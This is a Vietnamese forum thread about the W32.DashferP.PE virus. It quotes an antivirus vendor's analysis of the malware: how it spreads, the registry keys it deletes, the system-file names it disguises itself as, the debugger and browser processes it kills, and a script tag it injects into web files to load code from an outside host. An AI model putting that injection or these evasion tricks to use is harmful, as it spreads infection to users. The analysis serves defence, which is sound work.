Đã diệt được virus W32.DashferP.PE

[giaptk3]

virus W32.DashferP.PE bấy lâu nay không cho chúng ta vào được safe mode và file ~.exe nay đã được diệt với chương trình của bkav:
theo địa chỉ www.bkav.com.vn bạn tải chương trình ngày 18/08/2008 phiên bản
bkav2006 Version 1836.

 

[PhanTuHuong]

Ang giaptk3 có thể giải thích rõ hơn về con này được không? VD như nguồn gốc, kiểu lây lan ...

 

[Mr Okebab]

virus W32.DashferP.PE bấy lâu nay không cho chúng ta vào được safe mode và file ~.exe nay đã được diệt với chương trình của bkav:
theo địa chỉ www.bkav.com.vn bạn tải chương trình ngày 18/08/2008 phiên bản
bkav2006 Version 1836.

Đây là bác đấy à ??

http://bongda1.24h.com.vn/forum/showthread.php?p=675518

Ang giaptk3 có thể giải thích rõ hơn về con này được không? VD như nguồn gốc, kiểu lây lan

Theo BKAV :

Malware cập nhật mới nhất:​

• 
  [*]Tên malware: W32.DashferP.PE
  [*]Thuộc họ: W32.Dashfer.PE
  [*]Loại: PE
  [*]Ngày phát hiện mẫu: 29/12/2007
  [*]Kích thước: 86Kb
  [*]Mức độ phá hoại: Cao

Nguy cơ:

• 
  [*]Làm giảm mức độ an ninh của hệ thống.

Hiện tượng:

• 
  [*]Sửa registry.
  [*]Không vào được chế độ safe mode của windows.
  [*]Mất checkbox để hiển thị các file hệ thống.

Cách thức lây nhiễm:

• 
  [*]Phát tán qua trang web.
  [*]Tự động lây nhiễm qua USB.
  [*]Lây qua các file thực thi.

Cách phòng tránh:

• 
  [*]Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại
  [*]Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa.

Mô tả kỹ thuật:

• 
  [*]Xóa các key :
  HKLM\...\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
  HKLM\...\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
  HKLM\...\CurrentVersion\Run
  [*]Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup
  [*]Dump ra các file :
  %SysDir%\Com\smss.exe
  %SysDir%\Com\netcfg.dll
  %SysDir%\Com\netcfg.000
  [*]Sửa key làm mất checkbox để hiển thị các file hệ thống.
  [*]Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.
  [*]Tắt các process có chứa một trong các xâu sau : asm, ida, softice, ollydbg, metapad, mozillauiwindowclass, ieframe, cabinetwclass, 360
  [*]Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script :
  <script src="http://js.k01[removed].com/01.asp"></script>
  [*]Lây nhiễm vào các file thực thi tìm được trong máy.

Chuyên viên phân tích : Nguyễn Công Cường